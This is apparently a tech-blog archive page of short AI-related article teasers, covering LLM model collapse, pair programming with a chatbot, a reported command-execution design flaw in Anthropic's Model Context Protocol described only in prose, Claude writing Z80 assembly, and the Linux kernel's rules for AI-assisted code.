Why Model Collapse In LLMs Is Inevitable With Self-Learning

There is a persistent belief in the ‘AI’ community that large language models (LLMs) have the ability to learn and self-improve by tweaking the weights in their vector space. Although there’s scant evidence that tweaking a probability vector space is anything like the learning process in biological brains, we nevertheless get sold the idea that artificial general intelligence (AGI) is just around the corner if we do just enough tweaking.

Instead of emerging super intelligence, the most likely outcome is what is called model collapse, with a recent paper by [Hector Zenil] going over the details on why self-training/learning in LLMs and similar systems is a fool’s errand. For those who just want the brief summary with all the memes, [Metin] wrote a blog post covering the basics.

In the end an LLM as well as a diffusion model (DM) is a statistical model of input data using which a statistically likely output can be generated (inferred) based on an input query. It follows intuitively that by using said outputĀ  to adjust the model with, the model will over time converge on a kind of statistical singularity rather than some ‘AI singularity’ event. This is also why these models need to be constantly trained with external, human-generated data in order to prevent such a collapse.

In the paper by [Hector] a mathematical model is created to demonstrate that an LLM, DM or similar statistical model undergoes degenerative dynamics whenever said external input is reduced. Although in the paper a mechanism is suggested to counter the entropy decay within the model, the ultimate point is that a statistical model cannot improve itself without continuous external anchoring.

The idea of LLMs being at all intelligent in any sense has been a contentious one, with the concept of language models being equated with ‘AI’ dating back to the 20th century, including as fun home computer projects. Much of the problem probably lies in humans projecting intelligent behavior onto these statistical models, turning LLMs into ‘counterfeit humans’, not helped by how closely generated text can resemble something written by a human, even if completely confabulated.

Thanks to [deshipu] for the tip.

Trying Pair Programming With An LLM Chatbot

When it comes to software developers, there are a few distinct types. For example, the extroverted, chatty type, who is always going out there to share the latest and newest libraries and projects with everyone, and is very much into bouncing ideas off others, regardless of whether they know what you’re talking about. Then there is the introverted loner, who prefers to tackle programming challenges by bouncing things around inside their own minds and going on long walks to mull things over before committing to anything significant.

This leads to interesting scenarios when it comes to management-enforced ‘optimization’ strategies, like Pair Programming. This approach involves two developers sharing the same computer and keyboard, theoretically doubling the effective output by some kind of metric, but realistically often leading to at least one side feeling pretty miserable and disconnected unless you put two of the chatty types together.

As a certified introverted loner developer, the idea of using an LLM chatbot as a coding assistant naturally triggers unpleasant flashbacks to hours of forced awkward pair ‘programming’. However, maybe using an LLM chatbot could be more pleasant because you can skip the whole awkward socializing bit. In order to give it a shake, I put together a little experiment to see whether LLM-based coding assistants is something that I could come to appreciate, unlike pair programming.

Continue reading “Trying Pair Programming With An LLM Chatbot”

How Anthropic’s Model Context Protocol Allows For Easy Remote Execution

As part of the effort to push Large Language Model (LLM) ‘AI’ into more and more places, Anthropic’s Model Context Protocol (MCP) has been adopted as the standard to connect LLMs with various external tools and systems in a client-server model. A light oversight with the architecture of this protocol is that remote command execution (RCE) of arbitrary commands is effectively an essential part of its design, as covered in a recent article by [OX Security].

The details of this flaw are found in a detailed breakdown article, which applies to all implementations regardless of the programming language. Essentially the StdioServerParameters that are passed to the remote server to create a new local instance on said server can contain any command and arguments, which are executed in a server-side shell.

Continue reading “How Anthropic’s Model Context Protocol Allows For Easy Remote Execution”

AI For The Skeptics: The Universal Function For Some Things Only

It’s a phrase we use a lot in our community, “Drink the Kool-Aid”, meaning becoming unreasonably infatuated with a dubious idea, technology, or company. It has its origins in 1960s psychedelia, but given that it’s popularly associated with the mass suicide of the followers of Jim Jones in Guyana, perhaps we should find something else. In the sense we use it though, it has been flowing liberally of late with respect to AI, and the hype surrounding it. This series has attempted to peer behind that hype, first by examining the motives behind all that metaphorical Kool-Aid drinking, and then by demonstrating a simple example where the technology does something useful that’s hard to do another way. In that last piece we touched upon perhaps the thing that Hackaday readers should find most interesting, we saw the LLM’s possibility as a universal API for useful functions.

It’s Not What An LLM Can Make, It’s What It Can Do

When we program, we use functions all the time. In most programming languages they are built into the language or they can be user-defined. They encapsulate a piece of code that does something, so it can be repeatedly called. Life without them on an 8-bit microcomputer was painful, with many GOTO statements required to make something similar happen. It’s no accident then that when looking at an LLM as a sentiment analysis tool in the previous article I used a function GetSentimentAnalysis(subject,text) to describe what I wanted to do. The LLM’s processing capacity was a good fit to my task in hand, so I used it as the engine behind my function, taking a piece of text and a subject, and returning an integer representing sentiment. The word “do” encapsulates the point of this article, that maybe the hype has got it wrong in being all about what an LLM can make. Instead it should be all about what it canĀ do. The people thinking they’ve struck gold because they can churn out content slop or make it send emails are missing this. Continue reading “AI For The Skeptics: The Universal Function For Some Things Only”

Can Claude Write Z80 Assembly Code?

Betteridge’s law applies, but with help and guidance by a human who knows his stuff, [Ready Z80] was able to get a functioning game of Wordle out of the French-named LLM, which is more than we expected. It’s not like the folks at Anthropic spent much time making sure 40-year-old opcodes were well represented in their training data, after all.

For hardware, [Ready Z80] is working with the TEC-1G single-board-computer, which is a retrocomputer inspired by the TEC-1 whose design was published by Australian hobbyist magazine “Talking Electronics” back in the 1980s. Claude actually seemed to know what that was, and that it only had a hex keypad — though when [Ready Z80] was quick to correct it and let the LLM know he’s using a QWERTY keyboard add-on, Claude declared it was confident in its ability to write the code.

As usual for a LLM, Claude was overconfident and tossed out some nonexistent instructions. Though admittedly, it didn’t persist in that after being corrected. It’s notable that [Ready Z80] doesn’t prompt it with “Give me an implementation of Wordle in Z80 assembly for the TEC-1G” but goes through step-by-step, explaining exactly what he wants each section of the code to do. As [Dan Maloney] reported three years ago, it’s a bit like working with a summer intern.

In the end, they get a working game, but that was never in question. [Ready Z80] reveals over the course of the video he has the chops to have written it himself. Did using Claude make that go faster? Based on studies we’ve seen, it probably felt like it, even if it may have actually slowed him down.

Continue reading “Can Claude Write Z80 Assembly Code?”

AI For The Skeptics: Attempting To Do Something Useful With It

There are some subjects as a writer in which you know they need to be written, but at the same time you feel it necessary to steel yourself for the inevitable barrage of criticism once your work reaches its audience. Of these the latest is AI, or more specifically the current enthusiasm for Large Language Models, or LLMs. On one side we have the people who’ve drunk a little too much of the Kool-Aid and are frankly a bit annoying on the subject, while on the other we have those who are infuriated by the technology. Given the tide of low quality AI slop to be found online, we can see the latter group’s point.

This is the second in what may become an occasional series looking at the subject from the perspective of wanting to find the useful stuff behind the hype; what is likely to fall by the wayside, and what as yet unheard of applications will turn this thing into something more useful than a slop machine or an agent that might occasionally automate some of your tasks correctly. In the previous article I examined the motivation of that annoying Guy In A Suit who many of us will have encountered who wants to use AI for everything because it’s shiny and new, while in this one I’ll try to do something useful with it myself.

Continue reading “AI For The Skeptics: Attempting To Do Something Useful With It”

New Linux Kernel Rules Put The Onus On Humans For AI Tool Usage

It’s fair to say that the topic of so-called ‘AI coding assistants’ is somewhat controversial. With arguments against them ranging from code quality to copyright issues, there are many valid reasons to be at least hesitant about accepting their output in a project, especially one as massive as the Linux kernel. With a recent update to the Linux kernel documentation the use of these tools has now been formalized.

The upshot of the use of such Large Language Models (LLM) tools is that any commit that uses generated code has to be signed off by a human developer, and this human will ultimately bear responsibility for the code quality as well as any issues that the code may cause, including legal ones. The use of AI tools also has to be declared with the Assisted-by: tag in contributions so that their use can be tracked.

When it comes to other open source projects the approach varies, with NetBSD having banished anything tainted by ‘AI’, cURL shuttering its bug bounty program due to AI code slop, and Mesa’s developers demanding that you understand generated code which you submit, following a tragic slop-cident.

Meanwhile there are also rising concerns that these LLM-based tools may be killing open source through ‘vibe-coding’, along with legal concerns whether LLM-generated code respects the original license of the code that was ingested into the training model. Clearly we haven’t seen the end of these issues yet.